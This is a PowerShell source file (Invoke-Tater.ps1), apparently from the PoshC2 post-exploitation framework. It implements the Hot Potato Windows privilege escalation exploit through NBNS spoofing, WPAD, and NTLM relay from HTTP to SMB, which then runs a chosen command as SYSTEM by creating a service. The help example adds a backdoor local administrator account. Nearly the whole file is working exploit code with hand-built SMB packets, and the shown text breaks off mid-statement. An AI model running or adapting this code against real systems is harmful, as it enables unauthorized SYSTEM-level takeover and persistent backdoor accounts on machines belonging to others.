PoshC2_Python/Modules/Invoke-Tater.ps1

1818 lines
75 KiB
PowerShell

function Invoke-Tater
{
<#
.SYNOPSIS
Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit from
@breenmachine and @foxglovesec.
.DESCRIPTION
Invoke-Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation with functionality
similiar to Potato.exe available at https://github.com/foxglovesec/Potato.
.PARAMETER IP
Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used.
.PARAMETER SpooferIP
Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on
the privesc target.
.PARAMETER Command
Command to execute as SYSTEM on the localhost. Use PowerShell character escapes where necessary.
.PARAMETER NBNS
Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing.
.PARAMETER NBNSLimit
Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is
resolving correctly.
.PARAMETER ExhaustUDP
Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback
to NBNS resolution.
.PARAMETER HTTPPort
Default = 80: Specify a TCP port for the HTTP listener and redirect response.
.PARAMETER Hostname
Default = WPAD: Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008.
.PARAMETER WPADDirectHosts
Comma separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as
direct.
.PARAMETER WPADPort
Default = 80: Specify a proxy server port to be included in a the wpad.dat file.
.PARAMETER Trigger
Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature
Update, 2 = Windows 10 Webclient/Scheduled Task
.PARAMETER TaskDelete
Default = Tater: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be
added to the taskname to avoid failures after multiple trigger 2 runs.
.PARAMETER Taskname
Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple
trigger 2 runs, try changing the taskname.
.PARAMETER RunTime
(Integer) Set the run time duration in minutes.
.PARAMETER ConsoleOutput
Default = Enabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
ensure that it doesn't hang the shell.
.PARAMETER StatusOutput
Default = Enabled: (Y/N) Enable/Disable startup status messages.
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
.PARAMETER Tool
Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's
Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
.EXAMPLE
Invoke-Tater -Command "net user Tater Spring2016 /add && net localgroup administrators Tater /add"
.LINK
https://github.com/Kevin-Robertson/Tater
#>
# Default parameter values can be modified in this section
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSLimit="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ExhaustUDP="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$TaskDelete="Y",
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$IP="",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_ })][String]$SpooferIP="127.0.0.1",
[parameter(Mandatory=$false)][Int]$HTTPPort="80",
[parameter(Mandatory=$false)][Int]$RunTime="",
[parameter(Mandatory=$false)][ValidateSet(0,1,2)][Int]$Trigger="1",
[parameter(Mandatory=$true)][String]$Command="",
[parameter(Mandatory=$false)][String]$Hostname="WPAD",
[parameter(Mandatory=$false)][String]$Taskname="Tater",
[parameter(Mandatory=$false)][String]$WPADPort="80",
[parameter(Mandatory=$false)][Array]$WPADDirectHosts,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
if ($invalid_parameter)
{
throw "$($invalid_parameter) is not a valid parameter."
}
if(!$IP)
{
$IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
}
if(!$Command)
{
throw "You must specify an -Command if enabling -SMBRelay"
}
if($tater.running)
{
throw "Invoke-Tater is already running, use Stop-Tater"
}
$global:tater = [HashTable]::Synchronized(@{})
$tater.running = $true
$tater.console_queue = New-Object System.Collections.ArrayList
$tater.status_queue = New-Object System.Collections.ArrayList
$tater.console_input = $true
$tater.SMB_relay_active_step = 0
$tater.trigger = $Trigger
if($StatusOutput -eq 'Y')
{
$tater.status_output = $true
}
else
{
$tater.status_output = $false
}
if($Tool -eq 1) # Metasploit Interactive Powershell
{
$tater.tool = 1
$tater.newline = ""
$ConsoleOutput = "N"
}
elseif($Tool -eq 2) # PowerShell Empire
{
$tater.tool = 2
$tater.console_input = $false
$tater.newline = "`n"
$ConsoleOutput = "Y"
$ShowHelp = "N"
}
else
{
$tater.tool = 0
$tater.newline = ""
}
if($Trigger -eq 2)
{
$NBNS = 'N'
}
# Write startup messages
$tater.status_queue.Add("$(Get-Date -format 's') - Tater (Hot Potato Privilege Escalation) started") > $null
$tater.status_queue.Add("Local IP Address = $IP") > $null
if($HTTPPort -ne 80)
{
$tater.status_queue.Add("HTTP Port = $HTTPPort") > $null
}
if($NBNS -eq 'Y')
{
$tater.status_queue.Add("Spoofing Hostname = $Hostname") > $null
if($NBNSLimit -eq 'N')
{
$tater.status_queue.Add("NBNS Bruteforce Spoofer Limiting Disabled") > $null
}
}
else
{
$tater.status_queue.Add("NBNS Bruteforce Spoofing Disabled") > $null
}
if($SpooferIP -ne '127.0.0.1')
{
$tater.status_queue.Add("NBNS Spoofer IP Address = $SpooferIP") > $null
}
if($WPADDirectHosts.Count -gt 0)
{
$tater.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null
}
if($WPADPort -ne 80)
{
$tater.status_queue.Add("WPAD Port = $WPADPort") > $null
}
if($ExhaustUDP -eq 'Y')
{
$tater.status_queue.Add("UDP Port Exhaustion Enabled") > $null
}
if($Trigger -eq 0)
{
$tater.status_queue.Add("Relay Trigger Disabled") > $null
}
elseif($Trigger -eq 1)
{
$tater.status_queue.Add("Windows Defender Trigger Enabled") > $null
}
elseif($Trigger -eq 2)
{
$tater.status_queue.Add("Scheduled Task Trigger Enabled") > $null
$tater.taskname = $Taskname -replace " ","_"
if($TaskDelete -eq 'Y')
{
$tater.status_queue.Add("Scheduled Task Prefix = $Taskname") > $null
$tater.status_queue.Add("Scheduled Task Deletion Enabled") > $null
$tater.task_delete = $true
}
else
{
$tater.status_queue.Add("Scheduled Task = $Taskname") > $null
$tater.status_queue.Add("Scheduled Task Deletion Disabled") > $null
$tater.task_delete = $false
}
}
if($ConsoleOutput -eq 'Y')
{
$tater.status_queue.Add("Real Time Console Output Enabled") > $null
$tater.console_output = $true
}
else
{
if($tater.tool -eq 1)
{
$tater.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
}
else
{
$tater.status_queue.Add("Real Time Console Output Disabled") > $null
}
}
if($RunTime -eq '1')
{
$tater.status_queue.Add("Run Time = $RunTime Minute") > $null
}
elseif($RunTime -gt 1)
{
$tater.status_queue.Add("Run Time = $RunTime Minutes") > $null
}
if($ShowHelp -eq 'Y')
{
$tater.status_queue.Add("Run Stop-Tater to stop Tater early") > $null
if($tater.console_output)
{
$tater.status_queue.Add("Use Get-Command -Noun Tater* to show available functions") > $null
$tater.status_queue.Add("Press any key to stop real time console output") > $null
$tater.status_queue.Add("") > $null
}
}
if($tater.status_output)
{
while($tater.status_queue.Count -gt 0)
{
write-output($tater.status_queue[0] + $tater.newline)
$tater.status_queue.RemoveRange(0,1)
}
}
$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
$process_ID = $process_ID -replace "-00-00",""
[Byte[]] $tater.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
# Begin ScriptBlocks
# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
{
function DataLength
{
param ([Int]$length_start,[Byte[]]$string_extract_data)
$string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)
return $string_length
}
function DataToString
{
param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data)
$string_data = [System.BitConverter]::ToString($string_extract_data[($string_start + $string2_length + $string3_length)..($string_start + $string_length + $string2_length + $string3_length - 1)])
$string_data = $string_data -replace "-00",""
$string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$string_extract = New-Object System.String ($string_data,0,$string_data.Length)
return $string_extract
}
function DnsFlushResolverCache
{
$DNS_member_definition = @'
[DllImport("dnsapi.dll", EntryPoint="DnsFlushResolverCache")]
private static extern UInt32 DnsFlushResolverCache();
public static void FlushResolverCache()
{
UInt32 result = DnsFlushResolverCache();
}
'@
Add-Type -MemberDefinition $DNS_member_definition -Namespace DNSAPI -Name Flush -UsingNamespace System.Collections,System.ComponentModel
[DNSAPI.Flush]::FlushResolverCache()
}
function StopTater
{
$tater.console_queue.Add("$(Get-Date -format 's') - Stopping HTTP listener")
$tater.HTTP_client.Close()
start-sleep -s 1
$tater.HTTP_listener.server.blocking = $false
Start-Sleep -s 1
$tater.HTTP_listener.server.Close()
Start-Sleep -s 1
$tater.HTTP_listener.Stop()
if($tater.SMBRelay_success)
{
if($tater.trigger -eq 2)
{
if($tater.task_delete -and $tater.task_added)
{
$scheduled_task_deleted = $false
$schedule_service = new-object -com("Schedule.Service")
$schedule_service.Connect()
$scheduled_task_folder = $schedule_service.GetFolder("\")
$scheduled_task_list = $scheduled_task_folder.GetTasks(1)
foreach($scheduled_task in $scheduled_task_list)
{
if($scheduled_task.name -eq $tater.task)
{
$scheduled_task_folder.DeleteTask($scheduled_task.name,0)
}
}
foreach($scheduled_task in $scheduled_task_list)
{
if($scheduled_task.name -eq $tater.task)
{
$scheduled_task_deleted = $true
}
}
if($scheduled_task_deleted)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully")
}
else
{
$tater.console_queue.Add("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually")
}
}
elseif($tater.task_added)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished")
}
}
$tater.console_queue.Add("$(Get-Date -format 's') - Tater was successful and has exited")
}
else
{
$tater.console_queue.Add("$(Get-Date -format 's') - Tater was not successful and has exited")
}
Start-Sleep -s 1
$tater.running = $false
}
}
# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
$SMB_NTLM_functions_scriptblock =
{
function SMBNTLMChallenge
{
param ([Byte[]]$payload_bytes)
$payload = [System.BitConverter]::ToString($payload_bytes)
$payload = $payload -replace "-",""
$NTLM_index = $payload.IndexOf("4E544C4D53535000")
if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
{
$NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
}
return $NTLM_challenge
}
}
# SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
$SMB_relay_challenge_scriptblock =
{
function SMBRelayChallenge
{
param ($SMB_relay_socket,$HTTP_request_bytes)
if ($SMB_relay_socket)
{
$SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
}
$SMB_relay_challenge_bytes = New-Object System.Byte[] 1024
$i = 0
:SMB_relay_challenge_loop while ($i -lt 2)
{
switch ($i)
{
0
{
$SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,
0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xff,0xff +
$tater.process_ID_bytes +
0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,
0x20,0x30,0x2e,0x31,0x32,0x00
}
1
{
$SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
$SMB_blob_length = $SMB_blob_length -replace "-00-00",""
$SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28))
$SMB_byte_count = $SMB_byte_count -replace "-00-00",""
$SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 87))
$SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
$SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
[Array]::Reverse($SMB_netbios_length)
$SMB_relay_challenge_send = 0x00,0x00 +
$SMB_netbios_length +
0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
$tater.process_ID_bytes +
0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,
0x01,0x00,0x00,0x00,0x00,0x00 +
$SMB_blob_length +
0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
$SMB_byte_count +
$HTTP_request_bytes +
0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,
0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,
0x00,0x00
}
}
$SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length)
$SMB_relay_challenge_stream.Flush()
$SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length)
$i++
}
return $SMB_relay_challenge_bytes
}
}
# SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
$SMB_relay_response_scriptblock =
{
function SMBRelayResponse
{
param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
$SMB_relay_response_bytes = New-Object System.Byte[] 1024
if ($SMB_relay_socket)
{
$SMB_relay_response_stream = $SMB_relay_socket.GetStream()
}
$SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
$SMB_blob_length = $SMB_blob_length -replace "-00-00",""
$SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 28))
$SMB_byte_count = $SMB_byte_count -replace "-00-00",""
$SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 88))
$SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
$SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
[Array]::Reverse($SMB_netbios_length)
$j = 0
:SMB_relay_response_loop while ($j -lt 1)
{
$SMB_relay_response_send = 0x00,0x00 +
$SMB_netbios_length +
0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x03,0xc8,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
$tater.process_ID_bytes +
$SMB_user_ID +
0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,
0x00,0x00,0x00 +
$SMB_blob_length +
0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
$SMB_byte_count +
$HTTP_request_bytes +
0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,0x77,0x00,0x73,
0x00,0x00,0x00,0x6a,0x00,0x43,0x00,0x49,0x00,0x46,0x00,0x53,0x00,0x00,
0x00
$SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length)
$SMB_relay_response_stream.Flush()
$SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length)
$tater.SMB_relay_active_step = 2
$j++
}
return $SMB_relay_response_bytes
}
}
# SMB Relay Execute ScriptBlock - executes command within authenticated SMB session
$SMB_relay_execute_scriptblock =
{
function SMBRelayExecute
{
param ($SMB_relay_socket,$SMB_user_ID)
if ($SMB_relay_socket)
{
$SMB_relay_execute_stream = $SMB_relay_socket.GetStream()
}
$SMB_relay_failed = $false
$SMB_relay_execute_bytes = New-Object System.Byte[] 1024
$SMB_service_random = [String]::Join("00-", (1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
$SMB_service = $SMB_service_random -replace "-00",""
$SMB_service = $SMB_service.Substring(0,$SMB_service.Length-1)
$SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
$SMB_service_random += '00-00-00'
[Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$SMB_referent_ID_bytes = [String](1..4 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
$SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$Command = "%COMSPEC% /C `"" + $Command + "`""
[System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{ $SMB_relay_command += "{0:X2}-00-" -f $_ }
if([Bool]($Command.Length % 2))
{
$SMB_relay_command += '00-00'
}
else
{
$SMB_relay_command += '00-00-00-00'
}
[Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237)
$SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0]
$SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174)
$SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1]
$SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2)
$k = 0
:SMB_relay_execute_loop while ($k -lt 12)
{
switch ($k)
{
0
{
$SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,
0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xff,0xff +
$tater.process_ID_bytes +
$SMB_user_ID +
0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,
0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30,
0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00
}
1
{
$SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,
0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x08 +
$tater.process_ID_bytes +
$SMB_user_ID +
0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,
0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00
}
2
{
$SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x08 +
$tater.process_ID_bytes +
$SMB_user_ID +
0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f,
0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,
0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,
0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,
0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,
0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,
0x00
$SMB_multiplex_id = 0x05
}
3
{
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
}
4
{
$SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x08 +
$tater.process_ID_bytes +
$SMB_user_ID +
0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f,
0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,
0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
$SMB_service_bytes +
0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00
$SMB_multiplex_id = 0x07
}
5
{
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
}
6
{
$SMB_relay_execute_send = [Array]0x00 +
$SMB_service_data_length_bytes +
0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 +
$tater.process_ID_bytes +
$SMB_user_ID +
0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
0xff,0xff,0xff,0xff,0x08,0x00 +
$SMB_service_byte_count_bytes +
0x00,0x00 +
$SMB_service_byte_count_bytes +
0x3f,0x00,0x00,0x00,0x00,0x00 +
$SMB_service_byte_count_bytes +
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 +
$SMB_service_byte_count_bytes +
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
0x00 +
$SMB_context_handler +
0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
$SMB_service_bytes +
0x00,0x00 +
$SMB_referent_ID_bytes +
0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
$SMB_service_bytes +
0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,
0x00,0x00,0x00,0x00,0x00 +
$SMB_relay_command_length_bytes +
0x00,0x00,0x00,0x00 +
$SMB_relay_command_length_bytes +
$SMB_relay_command_bytes +
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00
$SMB_multiplex_id = 0x09
}
7
{
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
}
8
{
$SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x08 +
$tater.process_ID_bytes +
$SMB_user_ID +
0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f,
0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,
0x00,0x00,0x00,0x13,0x00 +
$SMB_context_handler +
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
}
9
{
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
}
10
{
$SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x08 +
$tater.process_ID_bytes +
$SMB_user_ID +
0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,
0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f,
0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,
0x00,0x00,0x00,0x02,0x00 +
$SMB_context_handler
}
11
{
$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
}
}
$SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length)
$SMB_relay_execute_stream.Flush()
if ($k -eq 5)
{
$SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
$SMB_context_handler = $SMB_relay_execute_bytes[88..107]
if(([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00') -and ([System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00'))
{
#$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
}
elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00')
{
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is not a local administrator on " + "$SMBRelayTarget")
$SMB_relay_failed = $true
}
else
{
$SMB_relay_failed = $true
}
}
elseif ($k -eq 7 -or $k -eq 9 -or $k -eq 11)
{
$SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
switch($k)
{
7 {
$SMB_context_handler = $SMB_relay_execute_bytes[92..111]
$SMB_relay_execute_error_message = "Service creation fault context mismatch"
}
11 {
$SMB_relay_execute_error_message = "Service start fault context mismatch"
}
13 {
$SMB_relay_execute_error_message = "Service deletion fault context mismatch"
}
}
if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00')
{
$SMB_relay_failed = $true
}
if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c')
{
$tater.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
$SMB_relay_failed = $true
}
}
else
{
$SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
}
if(!$SMB_relay_failed -and $k -eq 7)
{
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")
}
elseif(!$SMB_relay_failed -and $k -eq 9)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Command likely executed on $SMBRelayTarget")
}
elseif(!$SMB_relay_failed -and $k -eq 11)
{
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")
}
$SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,
0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x08 +
$tater.process_ID_bytes +
$SMB_user_ID +
$SMB_multiplex_ID +
